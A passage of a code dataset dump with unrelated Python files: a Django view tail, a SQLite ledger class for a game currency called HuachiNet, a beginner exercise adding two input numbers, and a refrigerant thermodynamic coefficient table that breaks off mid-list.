\"orderdisplay/morris.html\", context)\n\n# Delete\n\ndef page_one(request):\n customers = Customer.objects.all()[:10]\n context = { \"customers\":customers }\n return render(request, 'orderdisplay/page_one.html', context)\n\n\ndef page_two(request):\n search = request.POST['search']\n superheroes = Customer.objects.filter(first_name__startswith=search)\n context = { \"superheroes\":superheroes, \"search\":search }\n return render(request, 'orderdisplay/page_two.html', context)","sub_path":"orderdisplay/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"56185362","text":"import time\nfrom datetime import datetime\nimport sqlite3\nimport operator\nimport random\nimport string\n\nclass HuachiNet():\n \"\"\"Huachicol as a service\n ---------------------------------\n Requiere nombre de usuario para obtener la siguiente informacion:\n -Saldo total\n -Historial de movimientos (Global,Depositos,Retiros)\n\n El usuario puede realizar las siguientes funciones dentro de la red:\n \n -Bono_Bienvenida\n -Verificar_Usuario\n -Enviar_Bineros\n\n *Si el usuario no existe en la BD, se regresa None como valor\n \"\"\"\n\n def __init__(self,usuario):\n #Conexion a BD\n self.conn = sqlite3.connect(\"boveda.sqlite3\")\n self.cursor = self.conn.cursor()\n self.id = usuario\n self.perk, self.power, self.trait, self.weapon = self.Consultar_Perks()\n self.saldo_total = self.Consultar_Saldo()\n self.historial = self.Historial_Cuenta()\n self.depositos = self.Historial_Cuenta(tipo_movimiento=\"Deposito\")\n self.retiros = self.Historial_Cuenta(tipo_movimiento=\"Retiro\")\n self.asaltos = self.Historial_Cuenta(tipo_movimiento=\"Asalto\")\n self.huachitos = self.Historial_Cuenta(tipo_movimiento=\"Huachito\")\n self.premios_huachito = self.Historial_Cuenta(tipo_movimiento=\"Premio Huachito\")\n self.atracos = self.Historial_Cuenta(tipo_movimiento=\"Atraco\")\n self.levantones = self.Historial_Cuenta(tipo_movimiento=\"Levanton\")\n\n\n def Bono_Bienvenida(self,usuario):\n \"\"\"Entregar bineros a los clientes nuevos\"\"\"\n\n query = \"\"\"INSERT INTO transacciones (timestamp,usuario,cantidad,nota,origen_destino) VALUES (?,?,?,?,?)\"\"\"\n\n timestamp = time.time()\n\n try: \n self.cursor.execute(query,(timestamp,usuario,1000,\"Bono Inicial\",\"Bodega\"))\n\n self.cursor.execute(query,(timestamp,\"Bodega\",-1000,\"Retiro\",usuario))\n\n self.conn.commit()\n\n except Exception as e:\n print(f'----\\n{e}')\n \n def Verificar_Usuario(self,usuario):\n \"\"\"Verificar si existe el cliente en la BD\"\"\"\n\n existe = False\n\n query = \"\"\"SELECT ID FROM transacciones WHERE usuario=? LIMIT 1\"\"\"\n\n try:\n self.cursor\n\n resultado = self.cursor.execute(query,(usuario,)).fetchone()\n\n if resultado != None:\n\n existe = True\n\n except Exception as e:\n print(f'----\\n{e}')\n\n return existe\n\n def Enviar_Bineros(self,usuario,cantidad,nota=\"Default\"):\n \"\"\"Registrar transacciones de bineros\"\"\"\n \n query = \"\"\"INSERT INTO transacciones (timestamp,usuario,cantidad,nota,origen_destino) VALUES (?,?,?,?,?)\"\"\"\n\n timestamp = time.time()\n\n try:\n if nota == \"Default\":\n\n self.cursor.execute(query,(timestamp,usuario,cantidad,\"Deposito\",self.id))\n\n negativo = cantidad - (cantidad * 2)\n\n self.cursor.execute(query,(timestamp,self.id,negativo,\"Retiro\",usuario))\n\n self.conn.commit()\n\n elif nota != \"Default\":\n\n self.cursor.execute(query,(timestamp,usuario,cantidad,nota,self.id))\n\n negativo = cantidad - (cantidad * 2)\n\n self.cursor.execute(query,(timestamp,self.id,negativo,nota,usuario))\n\n self.conn.commit()\n\n except Exception as e:\n print(f'----\\n{e}')\n\n def Consultar_Saldo(self):\n \"\"\"Consulta el saldo total del cliente\"\"\"\n\n query = \"\"\"SELECT SUM(cantidad) FROM transacciones WHERE usuario=?\"\"\"\n\n try:\n self.cursor.execute(query,(self.id,))\n\n resultado = self.cursor.fetchone()\n\n return resultado[0]\n \n except Exception as e:\n print(f'----\\n{e}') \n \n def Historial_Cuenta(self, tipo_movimiento = \"Global\"):\n \"\"\"Consultar historial de movimientos del cliente desde el inicio de la cuenta\"\"\"\n try:\n if tipo_movimiento == \"Global\":\n query = \"\"\"SELECT id,timestamp,cantidad,nota,origen_destino FROM transacciones WHERE usuario=? ORDER BY id DESC\"\"\"\n parametros = (self.id,)\n\n else:\n query = \"\"\"SELECT id,timestamp,cantidad,origen_destino FROM transacciones WHERE usuario=? AND nota=? ORDER BY id DESC\"\"\"\n parametros = (self.id,tipo_movimiento)\n\n self.cursor.execute(query,parametros)\n\n resultado = self.cursor.fetchall()\n\n return resultado\n \n except Exception as e:\n print(f'----\\n{e}')\n \n \n def Mujicanos(self):\n \"\"\"Lista de usuarios activos\"\"\"\n\n #Obtener lista de usuarios\n query = \"\"\"SELECT usuario FROM transacciones WHERE nota='Bono Inicial'\"\"\"\n\n self.cursor.row_factory = lambda cursor, row: row[0]\n\n resultado = self.cursor.execute(query).fetchall()\n\n return list(filter(None,resultado))\n\n def Ranking(self):\n \"\"\"Forbes Mujico - Usuarios Abinerados\"\"\"\n\n #Obtener lista de usuarios\n query = \"\"\"SELECT usuario, SUM(cantidad) as cantidad FROM transacciones WHERE usuario in (SELECT usuario FROM transacciones WHERE nota='Bono Inicial') GROUP BY usuario ORDER BY cantidad DESC\"\"\"\n \n return self.cursor.execute(query).fetchall()\n\n def Huachiclave(self):\n \"\"\"Regresa la huachiclave vigente o genera una nueva\"\"\"\n\n query = \"\"\"SELECT timestamp,huachiclave,cantidad,entregado FROM huachilate WHERE entregado = '0' ORDER BY timestamp\"\"\"\n\n query2 = \"\"\"INSERT INTO huachilate (timestamp,huachiclave,cantidad,entregado) VALUES (?,?,?,?)\"\"\"\n\n resultado = self.cursor.execute(query).fetchall()\n\n if resultado == []:\n \n timestamp = time.time()\n \n huachiclave = \"\".join(random.choices(string.ascii_letters + string.digits,k = 7))\n\n cantidad = random.randint(5000,50000)\n\n self.cursor.execute(query2,(timestamp,huachiclave,cantidad,0))\n\n self.conn.commit()\n\n return (timestamp,huachiclave,cantidad)\n \n else:\n return resultado[-1]\n\n def Consultar_Perks(self):\n \"\"\"Consultar perk, power, trait y arma\"\"\"\n\n query = \"\"\"SELECT perk,power,trait,weapon FROM perks WHERE usuario = ?\"\"\"\n\n resultado = self.cursor.execute(query,(self.id,)).fetchall()\n\n #En caso de que el usuario no este en la tabla de perks, se añadira con stats basicos.\n if resultado == []:\n\n timestamp = time.time()\n \n query2 = \"\"\"INSERT INTO perks (timestamp,usuario,perk,power,trait,weapon) VALUES (?,?,?,?,?,?)\"\"\"\n\n self.cursor.execute(query2,(timestamp,self.id,\"Normal\",100,\"Normal\",\"Navaja\"))\n\n self.conn.commit()\n\n return (\"Normal\",100,\"Normal\",\"Navaja\")\n\n else:\n\n return resultado[-1]\n\n def Update_Perks(self,clase,item):\n \"\"\"Agregar y modificar perk,trait y weapon de los mujicanos\"\"\"\n\n query = f\"\"\"UPDATE perks SET {clase} = ? WHERE usuario = ?\"\"\"\n\n query2 = \"\"\"UPDATE perks SET power = 100 WHERE usuario = ?\"\"\"\n\n self.cursor.execute(query,(item,self.id))\n\n if clase == \"perk\":\n self.cursor.execute(query2,(self.id,))\n\n self.conn.commit()\n\n def Consumir_Energia(self,cantidad):\n \"\"\"Los perks necesitan energia para funcionar\"\"\"\n\n energia = self.power - cantidad\n\n query = \"\"\"UPDATE perks SET power = ? WHERE usuario = ?\"\"\"\n\n self.cursor.execute(query,(energia,self.id))\n\n self.conn.commit()\n\n\n \n\n","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"625704301","text":"# 10-6 加法运算:提示用户提供数值输入时,常出现的一个问题是,用户提供的是文本而不是数字。\n# 在这种情况下,当你尝试将输入转换为整数时,将引发TypeError 异常。\n# 编写一个程序,提示用户输入两个数字,再将它们相加并打印结果。在用户输入的任何一个值不是数字时都捕获TypeError 异常,\n# 并打印一条友好的错误消息。对你编写的程序进行测试:先输入两个数字,再输入一些文本而不是数字。\n\nprint('Input 2 numbers,')\ntry:\n first_num = input('Input the first number here: ')\n first_num = int(first_num)\n second_num = input('Input the second number here:')\n second_num = int(second_num)\n print(first_num + second_num)\nexcept ValueError:\n print('ERROR! Please input number!')\n","sub_path":"CH_10/10_6.py","file_name":"10_6.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"615719343","text":"# Python Import ==================\nimport math,sys\n\n# User Import\n#from Data import Data\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - \n# Job \t\t\t:\n#\n# Editor\t\t: aymhenry@gmail.com\n# - - - - - - - - - - - - - - - - - - - - - - - - - \n#-- PROPERTY ROUTINES REFERENCED:\n#-- bconst\tinitializes arrays of property coefficients\n#-- bublp\tsaturation properties at given pressure\n#-- bublt\tsaturation properties at given temperature\n#-- entrop\tmolar entropy\n#-- espar\tset up coefficients for equation of state\n#-- hcvcps\tmolar enthalpy and heat capacity\n#-- hpin\ttemperature, quality, etc. as a function of enthalpy and pressure\n#-- spin\ttemperature, quality, etc. as a function of entropy and temperature\n#-- vit\t\tcalculate specifi volume\n\nclass BData:\n\t#=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=\n\t#--\n\t#-- THIS ROUTINE INITIALIZES THE COMMON BLOCKS CONTAINING INFORMATION\n\t#-- ABOUT THE PURE COMPONENTS. IT IS NOT REFERENCED DIRECTLY BY ANY\n\t#-- OTHER SUBROUTINE BUT MUST BE INCLUDED IN THE EXECUTABLE ELEMENT.\n\t#-- DATA ARRAYS ARE DIMENSIONED TO ACCOMODATE ADDITIONAL\n\t#-- PURE COMPONENTS.\n\t#--\n\t#-- EXPLANATION OF CONSTANTS:\n\t#-- COEFF(I,J) - FOR REFRIGERANT J, COEFFICIENTS OF A, B, CP0\n\t#-- CURVE FITS:\n\t#-- A = A0 * EXP(A1*T + A2*T*T) (KJ M**3/KMOL**2)\n\t#-- B = B0 + B1*T + B2*T*T (M**3/KMOL)\n\t#-- CP0 = C0 + C1*T + C2*T*T (KJ/KMOL K)\n\t#-- (STORED IN ORDER A0,A1,A2,B0,B1,B2,C0,C1,C2)\n\t#-- CRIT(I,J) - FOLLOWING INFORMATION FOR REFRIGERANT J:\n\t#-- I = 1 - MOLECULAR WEIGHT\n\t#-- 2 - REFERENCE TEMPERATURE FOR ENTHALPY AND ENTROPY (K)\n\t#-- 3 - CRITICAL TEMPERATURE (K)\n\t#-- 4 - CRITICAL PRESSURE (KPA)\n\t#-- 5 - CRITICAL VOLUME (M**3/KMOL)\n\t#-- HREF(J) - REFRIGERANT NAME (ASHRAE DESIGNATION)\n\t#-- HZERO(J) - VALUE OF SATURATED LIQUID ENTHALPY OF REFRIGERANT\n\t#-- J AT ITS REFERENCE TEMPERATURE (KJ/KMOL)\n\t#-- SZERO(J) - VALUE OF SATURATED LIQUID ENTROPY AT REFERENCE\n\t#-- TEMPERATURE (KJ/KMOL K)\n\t#-- R - GAS CONSTANT (KJ/KMOL K)\n\t#-- TOLR - RELATIVE CONVERGENCE TOLERANCE FOR ITERATION LOOPS\n\t#-- SHOULD BE AT LEAST 10 TIMES LARGER THAN MACHINE PRECISION\n\t#-- ITMAX - MAXIMUM ITERATION COUNT FOR ITERATIVE LOOPS\n\t#-- LUP - LOGICAL UNIT TO WHICH ANY WARNING MESSAGES ARE WRITTEN\n\t#--\n\t#-- A, B COEFFFICIENTS EVALUATED FROM ASHRAE (1981) SATURATION\n\t#-- DATA UNLESS INDICATED.\n\t#--\n\t#-- DATA VALUES UPDATED ON 3/15/94 TO BE CONSISTENT WITH REFPROP 4.0\n\t#--\n\t#-- REFRIGERANTS NOW ARE:\n\t#-- 1: R11 2: R12 3: R13 4: n-C5 5: R14 6: R22\n\t#-- 7: R23 8: R113 9: R114 10: R142B 11: R152A 12: R216A\n\t#-- 13: R125 14: R143A 15: R134A 16: R123 17: RC318 18: R134\n\t#-- 19: RC270 20: R141B 21: i-C5 22: R290 23: R600 24: R600A\n\t#-- 25: R32 26: R1270 27: R124 28: R115 29: CE-216 30: E-125\n\t#-- 31: R123A 32: R143 33: R218 34: E134\n\t#--\n\t#-- NOTE: REFPROP 4.0 ALLOWS USE OF A MODIFIED B-W-R EQUATION OF STATE FOR\n\t#-- R32, R123, R124, R125, AND R134A AS PURE FULIDS. THE CSD EQUATION\n\t#-- OF STATE IS USED BY REFPROP FOR MIXTURES.\n\t#--\n\t#-- NOTE: THE FOLLOWING REFRIGERANTS WERE FIT WITH THE OLDER REFPROP (3.0)\n\t#-- COEFFICIENTS (BECAUSE OF A BETTER MATCH TO ASHRAE DATA OVER THE\n\t#-- -20 F TO + 130 F TEMPERATURE RANGE): R114\n\t#--\n\t#-- NOTE: THE COEFFICIENTS FOR R12 ARE THE SAME AS USED IN REFPROP 3.O TO\n\t#-- PROVIDE CONSISTENCY WITH EARLIER ANALYSES. THE REFPROP 4.0\n\t#-- COEFFICIENTS CHANGE THE ENERGY BY ABOUT 0.001 KWH/DAY. IT IS NOT\n\t#-- WORTH EXPLAINING AWAY DIFFERENCES BETWEEN THE RESULTS IN THE ERA\n\t#-- DOCUMENTATION AND A REVISED ERA USING THE REFPROP 4.O COEFFICIENTS\n\t#-- FOR R12.\t\n\t\n\n\t#-- Common HREF1 group ---------------------------------\n\tHREF = [] #[[\" \"] * (34+1)]\t\t# CHARACTER*6 HREF(34),REFH(34)\n\tREFH = [] #[[\" \"] * (34+1)]\n\t\n\t#-- Common ESDATA group ---------------------------------\n\tCOEFF = []\t\n\tCRIT = [] \n\n\t#-- Common HSZERO group ---------------------------------\n\tHZERO = [0.0] * (34+1)\n\tSZERO = [0.0] * (34+1)\n\n\t#-- Common REF group ---------------------------------\n\tTREF= [0.0] * (5+1)\n\tHR = [0.0] * (5+1)\n\tSR = [0.0] * (5+1)\n\tVR = [0.0] * (5+1)\n\t\n\t#-- Common RDATA2 group ---------------------------------\n\tWM = [0.0] * (5+1)\n\tTC = [0.0] * (5+1) \n\n\t#-- Common ESPAR1 group ---------------------------------\n\tF = [[0.0] * (5+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\tAP = [0.0] * (5+1)\n\tBP = [0.0] * (5+1)\n\tDADT = 0.0; DBDT = 0.0; D2ADT= 0.0; D2BDT = 0.0\n\t\n\t#-- Common CPDATA group ---------------------------------\n\t# Create zero base array\n\tC = [[0.0] * (2+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\n\t#-- Common RDATA1 group ---------------------------------\n\t# Create zero base array\n\tA = [[0.0] * (2+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\tB = [[0.0] * (2+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\n\t#-- Common RDATA4 group --------------------------------\n\tR = 8.314\n\t\n\t#-- Common TOL group ----------------------------------\n\tTOLR = 1.0E-7*10 # SHOULD BE AT LEAST 10 TIMES LARGER THAN MACHINE PRECISION\n\tITMAX = 20\n\tLUP = 9\n\n\t#-- Common HSPURE group ---------------------------------\n\tHP = [0.0] * (5+1)\n\tSP = [0.0] * (5+1)\n\tCP = [0.0] * (5+1)\n\n\t#-- Common TOLSH group ----------------------------------\n\tTOLH = 0.010\n\tTOLS = 0.001\n\t\n\t@staticmethod\n\tdef setup():\n\t\t# Ref 00\n\t\t# add one more Col and Row, to keep FORTRAN none zero Ref.\n\t\tBData.HREF.append (\" \")\n\t\tBData.REFH.append (\" \")\n\t\t\n\t\t#-- zero based BData.CRIT.append ([0.0] * 5)\n\t\t#-- zero based BData.COEFF.append ([0.0] * 9)\n\t\t#---------------------------------------\n\t\t# Ref 01\n\t\t# R11, TRICHLOROFLUOROMETHANE (CFCL3)\n\t\t#\n\t\tBData.HREF.append (\"R11\")\n\t\tBData.REFH.append (\" R11\")\n\t\t\n\t\tBData.CRIT.append ([137.37, 296.91, 471.2, 4467.0, 0.247])\n\t\t\n\t\tBData.COEFF.append ([ 4967.07, -2.23098E-3, -5.59203E-7,\t\t\\\n\t\t\t\t\t 0.178148, -1.82363E-4, -2.54131E-8,\t\\\n\t\t\t\t\t 23.4805, 0.251072, -2.28722E-4 ])\n\n\t\t# Ref 02\n\t\t# R12, DICHLORODIFLUOROMETHANE (CF2CL2)\n\t\t#\n\t\tBData.HREF.append (\"R12\")\n\t\tBData.REFH.append (\" R12\")\n\t\t\n\t\tBData.CRIT.append ([120.91, 243.39, 384.95, 4180.0, 0.241]) # error last item fixed (was 0.181)\n\t\tBData.COEFF.append ([ 3819.88, -3.31988E-3, 2.41944E-7,\t\\\n\t\t\t\t\t 0.165350, -2.65758E-4, 9.13878E-8,\t\\\n\t\t\t\t\t 18.4874, 0.241782, -2.04594E-4])\n\t\t# Ref 03\n\t\t# R13, CHLOROTRIFLUOROMETHANE (CF3CL)\n\t\t#\n\t\tBData.HREF.append (\"R13\")\n\t\tBData.REFH.append (\" R13\")\n\t\t\n\t\tBData.CRIT.append ([104.46, 191.67, 302.0, 3870.0, 0.181])\n\t\tBData.COEFF.append([ 2157.20, -2.84478E-3, -2.75122E-6,\t\\\n\t\t\t\t\t 0.129485, -1.93746E-4, -9.01119E-8,\t\\\n\t\t\t\t\t 13.8691, 0.232370, -1.83095E-4 ])\n\t\t# Ref 04\n\t\t# n-C5, n-Pentane (C5H12)\n\t\t#\n\t\tBData.HREF.append (\"n-C5\")\n\t\tBData.REFH.append (\" n-C5\")\n\t\tBData.CRIT.append ([72.15, 309.34, 469.5, 3359.9, 0.295])\n\t\tBData.COEFF.append ([6745.80, -2.29793E-3, -0.70747E-6,\t\\\n\t\t\t 0.228716, -2.36350E-4, -0.32793E-7,\t\\\n\t\t\t 54.7577, 0.143042, 2.53720E-4 ])\n\t\t \n\t\t# Ref 05\n\t\t# R14, TETRAFLUOROMETHANE (CF4)\n\t\t#\n\t\tBData.HREF.append (\"R14\")\n\t\tBData.REFH.append (\" R14\")\n\t\tBData.CRIT.append ([88.00, 145.17, 227.5, 3795.0, 0.141])\n\t\tBData.COEFF.append ([ 1272.41, -3.42946E-3, -6.47573E-6,\t\\\n\t\t\t 0.099664, -1.57113E-4, -2.95020E-7,\t\\\n\t\t\t 14.4296, 0.184530, -9.51890E-5 ])\n\t\t# Ref 06\n\t\t# R22, CHLORODIFLUOROMETHANE (CHF2CL)\n\t\t#\n\t\tBData.HREF.append (\"R22\")\n\t\tBData.REFH.append (\" R22\")\n\t\tBData.CRIT.append ( [86.47, 232.29, 369.3, 5054.0, 0.169 ] )\n\n\t\tBData.COEFF.append ([2624.62, -2.67304E-3, -1.33238E-6,\t\\\n\t\t\t 0.117395, -1.40272E-4, -0.52161E-7,\t\\\n\t\t\t 21.9839, 0.127744, -4.78872E-5 ] )\n\t\t# Ref 07\n\t\t# R23, TRIFLUOROMETHANE (CHF3)\n\t\t#\n\t\tBData.HREF.append (\"R23\")\n\t\tBData.REFH.append (\" R23\")\n\t\tBData.CRIT.append ( [70.01, 191.12, 299.1, 4900.0, 0.133 ] )\n\n\t\tBData.COEFF.append ( [ 1743.89, -3.52595E-3, -1.12774E-6,\n\t\t\t 0.090205, -1.25602E-4, -0.50675E-7,\n\t\t\t 23.6029, 0.082287, 3.18265E-5 ] )\n\t\t# Ref 08\n\t\t# R113, 1,1,2-TRICHLOROTRIFLUOROETHANE (CF2CL-CFCL2)\n\t\t#\n\t\tBData.HREF.append (\"R113\")\n\t\tBData.REFH.append (\" R113\")\n\t\tBData.CRIT.append ( [ 187.38, 320.80, 487.5, 3456.0, 0.329 ] )\n\n\t\tBData.COEFF.append ( [ 7284.48, -2.15870E-3, -8.03754E-7,\t\t\\\n\t\t\t 0.234712, -2.11131E-4, -7.33758E-8,\t\t\\\n\t\t\t 76.2637, 0.119641, 7.18786E-5 ] )\n\t\t# Ref 09\n\t\t# R114, 1,2-DICHLOROTETRAFLUOROETHANE (CF2CL-CF2CL): Version 3.0 Refprop\n\t\t#\n\t\tBData.HREF.append (\"R114\")\n\t\tBData.REFH.append (\" R114\")\n\t\tBData.CRIT.append ( [ 170.92, 276.80, 418.80, 3248.0, 0.307 ] )\n\n\t\tBData.COEFF.append ( [ 5929.74, -2.86018E-3, -4.81520E-7,\t\t\\\n\t\t\t 0.221874, -2.88304E-4, 1.81892E-8,\t\t\\\n\t\t\t 37.2482, 0.337339, -2.39995E-4 ] )\n\t\t \n\t\t# Ref 10\n\t\t# R142B, 1-CHLORO-1,1-DIFLUOROETHANE (CF2CL-CH3)\n\t\t#\n\t\tBData.HREF.append (\"R142B\")\n\t\tBData.REFH.append (\" R142B\")\n\t\tBData.CRIT.append ( [100.49, 264.01, 410.3, 4120.0, 0.231 ] )\n\n\t\tBData.COEFF.append ( [ 4180.75, -2.73043E-3, -5.43638E-7,\t\t\\\n\t\t\t 0.169138, -2.41068E-4, 0.67566E-7,\t\t\\\n\t\t\t 16.3914, 0.271719, -1.58933E-4 ] )\n\t\t# Ref 11\n\t\t# R152A, 1,1-DIFLUOROETHANE (CHF2-CH3)\n\t\t#\n\t\tBData.HREF.append (\"R152A\")\n\t\tBData.REFH.append (\" R152A\")\n\t\tBData.CRIT.append ( [ 66.05, 248.50, 386.7, 4492.0, 0.181 ] )\n\n\t\tBData.COEFF.append ( [3198.63, -2.96134E-3, -0.32190E-6,\t\t\\\n\t\t\t 0.133264, -2.03633E-4, 0.777251E-7,\t\t\\\n\t\t\t 22.2832, 0.153987, -3.015434E-6 ] )\n\t\t# Ref 12\n\t\t# R216A, 1,3-DICHLOROHEXAFLUOROPROPANE [NOT IN REFPROP4.0]\n\t\t#\n\t\tBData.HREF.append (\"R216A\")\n\t\tBData.REFH.append (\" R216A\")\n\t\tBData.CRIT.append ( [ 220.93, 233.15, 453.14, 2754.1, 0.3847 ] )\n\n\t\tBData.COEFF.append ( [ 8431.44, -2.45916E-3, -9.91754E-7,\t\t\\\n\t\t\t 0.265720, -2.20418E-4, -1.68111E-7,\t\t\\\n\t\t\t 8.79769, 0.654246, -5.39923E-4 ] )\n\t\t# Ref 13\n\t\t# R125, PENTAFLUOROETHANE (C2HF5)\n\t\t#\n\t\tBData.HREF.append (\"R125\")\n\t\tBData.REFH.append (\" R125\")\n\t\tBData.CRIT.append ( [120.03, 224.6, 339.4, 3629.0, 0.2099 ] )\n\n\t\tBData.COEFF.append ( [ 3427.92, -3.17461E-3, -1.75729E-6,\t\t\\\n\t\t\t 0.149380, -1.80851E-4, -1.18813E-7,\t\t\\\n\t\t\t 22.65024, 0.295668, -1.69490E-4 ] )\n\t\t# Ref 14\n\t\t# R143A, 1,1,1-TRIFLUOROETHANE (CF3-CH3)\n\t\t#\n\t\tBData.HREF.append (\"R143A\")\n\t\tBData.REFH.append (\" R143A\")\n\t\tBData.CRIT.append ( [ 84.04, 225.8, 346.3, 3811., 0.194] )\n\n\t\tBData.COEFF.append ( [ 2763.90920, -2.509056E-3, -1.797108E-6,\t\t\\\n\t\t\t 0.133153E0, -1.589538E-4, -0.583311E-7,\t\t\\\n\t\t\t 13.89426E0, .2554913, -1.300829E-4] )\n\t\t# Ref 15\n\t\t# R134A: 1,1,1,2-TETRAFLUOROETHANE (CF3-CH2F)\n\t\t#\n\t\tBData.HREF.append (\"R134a\")\n\t\tBData.REFH.append (\" R134a\")\n\t\tBData.CRIT.append ( [ 102.030, 247.0, 374.3, 4067.0, 0.199 ] )\n\n\t\tBData.COEFF.append ( [ 3582.17, -2.81114E-3, -1.44679E-6,\t\t\\\n\t\t\t 0.141750, -1.62763E-4, -.628933E-7,\t\t\\\n\t\t\t 19.4006, 0.258531, -1.29665E-4 ] )\n\t\t# Ref 16\n\t\t# R123, 1,1-DICHLORO-2,2,2-TRIFLUOROETHANE (CHCL2-CF3)\n\t\t#\n\t\tBData.HREF.append (\"R123\")\n\t\tBData.REFH.append (\" R123\")\n\t\tBData.CRIT.append ( [ 152.93, 301.02, 456.9, 3674.0, 0.278 ] )\n\n\t\tBData.COEFF.append ( [ 6033.29, -2.37891E-3, -0.84728E-6,\t\t\\\n\t\t\t 0.199549, -1.89493E-4, -0.67680E-7,\t\t\\\n\t\t\t 29.2604, 0.302994, -1.92907E-4 ] )\n\t\t \n\t\t# Ref 17\n\t\t# RC318, PERFLUOROCYCLOBUTANE (C4F8)\n\t\t#\n\t\tBData.HREF.append (\"RC-318\")\n\t\tBData.REFH.append (\"RC-318\")\n\t\tBData.CRIT.append ( [ 200.04, 266.1, 388.4, 2778., 0.3248 ] )\n\n\t\tBData.COEFF.append ( [ 6182.614E0, -2.536687E-3, -2.265766E-6,\t\t\\\n\t\t\t .2255416E0, -1.898425E-4, -2.635465E-7,\t\t\\\n\t\t\t 28.972075E0, .5333363, -3.557726E-4] )\n\t\t# Ref 18\n\t\t# R134, 1,1,2,2-TETRAFLOUROETHANE (CHF2-CHF2)\n\t\t#\n\t\tBData.HREF.append (\"R134\")\n\t\tBData.REFH.append (\" R134\")\n\t\tBData.CRIT.append ( [ 102.03, 253.34, 392.1, 4562.0, 0.189 ] )\n\n\t\tBData.COEFF.append ( [ 3547.10, -2.68720E-3, -1.41578E-6,\t\t\\\n\t\t\t 0.13856, -1.5991E-4, -0.55880E-7,\t\t\\\n\t\t\t 32.5208, 0.222819, -1.06829E-4 ] )\n\t\t# Ref 19\n\t\t# RC270, CYCLOPROPANE (C3H6)\n\t\t#\n\t\tBData.HREF.append (\"RC270\")\n\t\tBData.REFH.append (\" RC270\")\n\t\tBData.CRIT.append ( [42.081, 240.25, 398.30, 5580.0, 0.194 ] )\n\n\t\tBData.COEFF.append ( [ 2745.00, -2.98122E-3, 1.64391E-7,\t\t\\\n\t\t\t 0.125065, -2.01031E-4, 7.8506E-8,\t\t\\\n\t\t\t 8.19470, 0.136885, 0.777583E-4 ] )\n\t\t# Ref 20\n\t\t# R141b, 1,1-DICHLORO-1-FLUOROETHANE (CFCL2-CH3)\n\t\t#\n\t\tBData.HREF.append (\"R141B\")\n\t\tBData.REFH.append (\" R141b\")\n\t\tBData.CRIT.append ( [116.94, 305.35, 477.3, 4120., 0.217 ] )\n\n\t\tBData.COEFF.append ( [ 5422.38, -2.24167E-3, -6.04435E-7,\t\t\\\n\t\t\t 0.180853, -1.61856E-4, -6.23542E-8,\t\t\\\n\t\t\t 35.8434, 0.175268, 0.0 ] )\n\t\t# Ref 21\n\t\t# i-C5 ISO-PENTANE (C4H9-CH3)\n\t\t#\n\t\tBData.HREF.append (\"i-C5\")\n\t\tBData.REFH.append (\" i-C5\")\n\t\tBData.CRIT.append ( [ 72.150, 300.9, 460.51, 3370.7, 0.306 ] )\n\n\t\tBData.COEFF.append ( [ 6408.1, -2.3216E-3, -0.7087E-6,\t\t\\\n\t\t\t 0.227727, -2.4414E-4, -2.9694E-8,\t\t\\\n\t\t\t 12.216, 0.37563, -5.9925E-5 ] )\n\t\t# Ref 22\n\t\t# R290, PROPANE (C3H8)\n\t\t#\n\t\tBData.HREF.append (\"R290\")\n\t\tBData.REFH.append (\" R290\")\n\t\tBData.CRIT.append ( [ 44.10, 231.1, 369.85, 4247.7, 0.220 ] )\n\n\t\tBData.COEFF.append ( [ 2988.28, -2.62902E-3, -1.09706E-6,\t\t\\\n\t\t\t 0.142963, -1.76519E-4, -5.78514E-8,\t\t\\\n\t\t\t 26.88900, 0.1250300, 1.07890E-4 ] )\n\t\t# Ref 23\n\t\t# R600, N-BUTANE (C4H10)\n\t\t#\n\t\tBData.HREF.append (\"R600\")\n\t\tBData.REFH.append (\" R600\")\n\t\tBData.CRIT.append ( [ 58.124, 272.6, 425.16, 3796., 0.2548 ] )\n\n\t\tBData.COEFF.append ( [4822.7, -2.6499E-3, -0.4397E-6,\t\t\\\n\t\t\t 0.1908, -2.4836E-4, 0.2846E-7,\t\t\\\n\t\t\t 9.442, 0.3317, -1.1297E-4 ] )\n\t\t# Ref 24\n\t\t# R600a, ISOBUTANE [C(CH3)3]\n\t\t#\n\t\tBData.HREF.append (\"R600a\")\n\t\tBData.REFH.append (\" R600a\")\n\t\tBData.CRIT.append ( [58.124, 261.39, 407.9, 3630.6, 0.256 ] )\n\n\t\tBData.COEFF.append ([ 4197.24, -2.1894E-3, -1.3004E-6,\t\\\n\t\t\t 0.1803, -1.8719E-4, -8.1778E-8,\t\t\\\n\t\t\t 27.6833, 0.199384, 1.06305E-4 ] )\n\t\t# Ref 25\n\t\t# R32: DIFLUOROMETHANE (CH2F2)\n\t\t#\n\t\tBData.HREF.append (\"R32\")\n\t\tBData.REFH.append (\" R32\")\n\t\tBData.CRIT.append ( [52.024, 221.40, 351.36, 5791.0, .120 ] )\n\n\t\tBData.COEFF.append ([ 1662.27, -2.19753E-3, -1.88903E-6,\t\\\n\t\t\t 0.0779879, -0.75238E-4, -0.53011E-7,\t\\\n\t\t\t 29.2127, 0.0192902, 8.91429E-5 ] )\n\t\t# Ref 26\n\t\t# R1270, PROPYLENE (C3H6)\n\t\t#\n\t\tBData.HREF.append (\"R1270\")\n\t\tBData.REFH.append (\" R1270\")\n\t\tBData.CRIT.append ( [42.09, 255.46, 364.9, 4621.7, 0.1937 ] )\n\t\tBData.HZERO [26] = -8695.95 ; BData.SZERO [26] = 170.53 # DATA HZERO(26),SZERO(26) -8695.95, 170.53 ] )\n\t\t\t \n\t\tBData.COEFF.append ([ 2294.38, -1.57422E-03, -2.98847E-06,\\\n\t\t\t .1253157, 